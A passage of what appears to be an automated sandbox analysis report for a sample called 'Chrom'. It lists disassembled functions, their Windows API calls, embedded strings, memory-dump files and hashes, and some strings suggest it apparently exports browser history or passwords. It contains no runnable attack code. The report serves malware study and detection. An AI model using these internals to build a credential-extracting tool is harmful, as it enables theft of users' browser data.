                                                                                                                                                        • Instruction Fuzzy Hash: 024154B1940219AAEB20EB55CC81EEB737CFF45304F0540BBB908A2552E7399B988F65
                                                                                                                                                        Function 0040FCDB Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 121COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                        • API String ID: 2000436516-3842416460
                                                                                                                                                        • Opcode ID: 35a9874a1796bbad2c5835aadc159d16ef12338abd3b36aedf42a62c4a9f3186
                                                                                                                                                        • Instruction ID: 16ebb7c4a1209ddf7042b365c973bf7ab66be9daa39a45122df40dcc931b4b2c
                                                                                                                                                        • Opcode Fuzzy Hash: 35a9874a1796bbad2c5835aadc159d16ef12338abd3b36aedf42a62c4a9f3186
                                                                                                                                                        • Instruction Fuzzy Hash: F64194B1940219AAEB20EB55CC81EEB777CFF45304F0540BBF908E2552E7399B988F65
                                                                                                                                                        Function 0040C009 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004083CC: _wcsicmp.MSVCRT ref: 004083FD
                                                                                                                                                          • Part of subcall function 004086CB: memset.MSVCRT ref: 004087C7
                                                                                                                                                        • free.MSVCRT ref: 0040C1F8
                                                                                                                                                          • Part of subcall function 0040BAAE: _wcsicmp.MSVCRT ref: 0040BAC7
                                                                                                                                                        • memset.MSVCRT ref: 0040C0DE
                                                                                                                                                          • Part of subcall function 0040B04F: wcslen.MSVCRT ref: 0040B062
                                                                                                                                                          • Part of subcall function 0040B04F: memcpy.MSVCRT(?,?,00000000,00000000,0040D237,00000000,?,?), ref: 0040B081
                                                                                                                                                        • wcschr.MSVCRT ref: 0040C116
                                                                                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C14A
                                                                                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C165
                                                                                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C180
                                                                                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044F4CC,00000000,00000000,74DF2EE0), ref: 0040C19B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                        • API String ID: 3849927982-2252543386
                                                                                                                                                        • Opcode ID: 88369df32d75ba6dda54d6ab21b62e9966401b16cb4a5860ce309962b4da41d8
                                                                                                                                                        • Instruction ID: 832bc5c0d001ab4c3975677652535c3cfd3fcf8644338d95e37f76bfb8271b51
                                                                                                                                                        • Opcode Fuzzy Hash: 88369df32d75ba6dda54d6ab21b62e9966401b16cb4a5860ce309962b4da41d8
                                                                                                                                                        • Instruction Fuzzy Hash: D2514071E003099BDB10DFA5DD86ADEB7B8AF40704F15453BA504BB2D2EB7899058F58
                                                                                                                                                        Function 0040E055 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040E07B
                                                                                                                                                        • memset.MSVCRT ref: 0040E097
                                                                                                                                                          • Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194
                                                                                                                                                          • Part of subcall function 00446665: GetFileVersionInfoSizeW.VERSION(0040E0C9,?,00000000), ref: 0044667B
                                                                                                                                                          • Part of subcall function 00446665: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040E0C9,?,00000000), ref: 00446696
                                                                                                                                                          • Part of subcall function 00446665: GetFileVersionInfoW.VERSION(0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466A6
                                                                                                                                                          • Part of subcall function 00446665: VerQueryValueW.VERSION(00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466B9
                                                                                                                                                          • Part of subcall function 00446665: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466F6
                                                                                                                                                          • Part of subcall function 00446665: _snwprintf.MSVCRT ref: 00446716
                                                                                                                                                          • Part of subcall function 00446665: wcscpy.MSVCRT ref: 00446740
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040E0DB
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040E0EA
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040E0FA
                                                                                                                                                        • EnumResourceNamesW.KERNEL32(0040E1F9,00000004,0040DE05,00000000), ref: 0040E15F
                                                                                                                                                        • EnumResourceNamesW.KERNEL32(0040E1F9,00000005,0040DE05,00000000), ref: 0040E169
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040E171
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$hE$strings
                                                                                                                                                        • API String ID: 3037099051-2452564618
                                                                                                                                                        • Opcode ID: 36a298b38765c7c9715b799f2682acc7fcb4a893d173dce7fa7602aae9355a61
                                                                                                                                                        • Instruction ID: 2c5873c7a60e264be4f9171a36220462047ece05b997d6ce6468ce1c7a270e3a
                                                                                                                                                        • Opcode Fuzzy Hash: 36a298b38765c7c9715b799f2682acc7fcb4a893d173dce7fa7602aae9355a61
                                                                                                                                                        • Instruction Fuzzy Hash: DB21D972E4021875D720BB978C46FCB3B6C9F45758F010477B90876193E6B85BC885AE
                                                                                                                                                        Function 00404B0A Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 283COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00404B34
                                                                                                                                                          • Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE
                                                                                                                                                        • memcpy.MSVCRT(0000013F,00000000,00000000,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 00404C24
                                                                                                                                                        • memcmp.MSVCRT(00000000,0045B4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 00404C34
                                                                                                                                                        • memcpy.MSVCRT(00000014,00000023,?), ref: 00404C67
                                                                                                                                                        • memcpy.MSVCRT(0000012F,?,00000010), ref: 00404C80
                                                                                                                                                        • memcmp.MSVCRT(00000000,0045B4E8,00000006), ref: 00404C96
                                                                                                                                                        • memcpy.MSVCRT(00000014,00000015,?), ref: 00404CB2
                                                                                                                                                        • memcpy.MSVCRT(-0000011F,?,00000010), ref: 00404CCB
                                                                                                                                                        • memcmp.MSVCRT(00000000,0045B238,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404D79
                                                                                                                                                        • memcmp.MSVCRT(00000000,0045B500,00000006), ref: 00404D91
                                                                                                                                                        • memcpy.MSVCRT(00000268,00000023,?), ref: 00404DCA
                                                                                                                                                        • memcpy.MSVCRT(000003C8,00000042,00000010), ref: 00404DE6
                                                                                                                                                        • memcpy.MSVCRT(-00000368,00000054,00000020), ref: 00404E02
                                                                                                                                                        • memcmp.MSVCRT(00000000,0045B4F8,00000006), ref: 00404E14
                                                                                                                                                        • memcpy.MSVCRT(00000268,00000015,?), ref: 00404E38
                                                                                                                                                        • memcpy.MSVCRT(-00000368,0000001A,00000020), ref: 00404E50
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3715365532-3916222277
                                                                                                                                                        • Opcode ID: 5ecca13a8667a5055cb12e86e8931f63f7f9f3ee63bd6537aeb0e59f26b2527b
                                                                                                                                                        • Instruction ID: 9db0de9f1e5b33104745f3d8eac733b3821debaf75d372e7250164ca2aaf5d57
                                                                                                                                                        • Opcode Fuzzy Hash: 5ecca13a8667a5055cb12e86e8931f63f7f9f3ee63bd6537aeb0e59f26b2527b
                                                                                                                                                        • Instruction Fuzzy Hash: 03A1C8B1A01215ABDB11EF61CC41BDF73A8BF45308F01453BFA15E7282E778AA548BD9
                                                                                                                                                        Function 004097B9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,00409C47,?,?,?,0000001E,?,?,00000104), ref: 004097E2
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,00409C47,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004097F6
                                                                                                                                                          • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
                                                                                                                                                        • memset.MSVCRT ref: 00409828
                                                                                                                                                        • memset.MSVCRT ref: 0040984A
                                                                                                                                                        • memset.MSVCRT ref: 0040985F
                                                                                                                                                        • strcmp.MSVCRT ref: 0040989E
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?), ref: 00409934
                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?), ref: 00409953
                                                                                                                                                        • memset.MSVCRT ref: 00409967
                                                                                                                                                        • strcmp.MSVCRT ref: 004099C4
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 004099F6
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00409C47,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004099FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                        • String ID: ---
                                                                                                                                                        • API String ID: 3751793120-2854292027
                                                                                                                                                        • Opcode ID: 9829021a33fa0c4240cc714bdbc117138227f934a385a668a1d7ce2f2a0a4b46
                                                                                                                                                        • Instruction ID: b5e8b399fdeb6a040b223f826d27245e63d255c1968850f26e436778d13c1eb2
                                                                                                                                                        • Opcode Fuzzy Hash: 9829021a33fa0c4240cc714bdbc117138227f934a385a668a1d7ce2f2a0a4b46
                                                                                                                                                        • Instruction Fuzzy Hash: 946173B2C0526DAADF21EB948C859DFB7BCAB15314F1440BFE504B3242DB385E85CB69
                                                                                                                                                        Function 00412145 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                        • API String ID: 2081463915-1959339147
                                                                                                                                                        • Opcode ID: 64e89c5a136ad70e2acd74f1c00236fdbd2f6e87aea00cca4f40c1ec5a2b789d
                                                                                                                                                        • Instruction ID: e86e95086dff50f6aeac70f7173157b3529105d44adcd95765e423e28c57b3de
                                                                                                                                                        • Opcode Fuzzy Hash: 64e89c5a136ad70e2acd74f1c00236fdbd2f6e87aea00cca4f40c1ec5a2b789d
                                                                                                                                                        • Instruction Fuzzy Hash: 7201DE7328B31134F825A1A72D27B8707598BD2B7BF32455BF915C81C5EF8C849450AE
                                                                                                                                                        Function 0041530E Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0041533A
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0041534B
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041535C
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041536D
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0041537E
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0041539E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                        • API String ID: 2012295524-70141382
                                                                                                                                                        • Opcode ID: 525b725ba8c3cdc06b652b5915534c9690f6b9e2340cfe00d9bbfd5c1f2d1a79
                                                                                                                                                        • Instruction ID: 5d1c1eff7ac7706bec5e35702e10e1a9346d9393ddc5072ea1b98c1f41432ca5
                                                                                                                                                        • Opcode Fuzzy Hash: 525b725ba8c3cdc06b652b5915534c9690f6b9e2340cfe00d9bbfd5c1f2d1a79
                                                                                                                                                        • Instruction Fuzzy Hash: 080175B0941B15D9D7115B35ED00BBB3FA49B85B82B10003BEC14D2A92DBBCC8469B6D
                                                                                                                                                        Function 0041528A Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,004138C5), ref: 00415299
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004152B2
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004152C3
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004152D4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004152E5
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004152F6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                        • API String ID: 667068680-3953557276
                                                                                                                                                        • Opcode ID: 26c7815ee6b58201438f61c557156c8ff69da56f2b6ddbed2f7ec124cb4fbf79
                                                                                                                                                        • Instruction ID: 5e4339a03d4da52fda9f673776543f218f6d4f87af018ab15887d8e286533b58
                                                                                                                                                        • Opcode Fuzzy Hash: 26c7815ee6b58201438f61c557156c8ff69da56f2b6ddbed2f7ec124cb4fbf79
                                                                                                                                                        • Instruction Fuzzy Hash: 70F08630905B19E997215F35AD61BBF2EE89785B82714043BEC00D3296DBA8C8468AAC
                                                                                                                                                        Function 00411CBF Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00411D4C
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00411D57
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00411D6C
                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00411D7F
                                                                                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00411D8D
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00411D9E
                                                                                                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00411DD2
                                                                                                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00411DDE
                                                                                                                                                          • Part of subcall function 00411B13: GetCursorPos.USER32(?), ref: 00411B1D
                                                                                                                                                          • Part of subcall function 00411B13: GetSubMenu.USER32(?,00000000), ref: 00411B2B
                                                                                                                                                          • Part of subcall function 00411B13: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00411B5C
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411DF9
                                                                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 00411E02
                                                                                                                                                        • SetCursor.USER32(00000000), ref: 00411E09
                                                                                                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00411E51
                                                                                                                                                        • memcpy.MSVCRT(?,?,00002008), ref: 00411E9A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1700100422-0
                                                                                                                                                        • Opcode ID: 1cf45927c7e1b7e483f25d449432d44785f5cb0323d7f80aabb60001f85816e7
                                                                                                                                                        • Instruction ID: c3388cb0b8e88e79d9fe84f40c546f28c4105956407e34fadf5c2981354f7f70
                                                                                                                                                        • Opcode Fuzzy Hash: 1cf45927c7e1b7e483f25d449432d44785f5cb0323d7f80aabb60001f85816e7
                                                                                                                                                        • Instruction Fuzzy Hash: 4D61B031604205ABDB14EFA4CC89BEA77A5FF44301F10452AFB059B2A1CB79AC91CB99
                                                                                                                                                        Function 0040DF8F Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 42COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040DFA9
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040DFB9
                                                                                                                                                        • GetPrivateProfileIntW.KERNEL32(0045E668,rtl,00000000,0045E458), ref: 0040DFCA
                                                                                                                                                          • Part of subcall function 0040DB0B: GetPrivateProfileStringW.KERNEL32(0045E668,?,0044F4CC,0045E6F8,?,0045E458), ref: 0040DB27
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                        • String ID: TranslatorName$TranslatorURL$XE$charset$general$hE$rtl$xE
                                                                                                                                                        • API String ID: 3176057301-1663435254
                                                                                                                                                        • Opcode ID: ce03a71f4104ba65c7634943c1c0a2916f24712798544291b36441c7694ed038
                                                                                                                                                        • Instruction ID: 3d8b461fbaaec7ca5a0689e4e93172b3bcab4f1f7887f11f1c83d51a75cfd1f7
                                                                                                                                                        • Opcode Fuzzy Hash: ce03a71f4104ba65c7634943c1c0a2916f24712798544291b36441c7694ed038
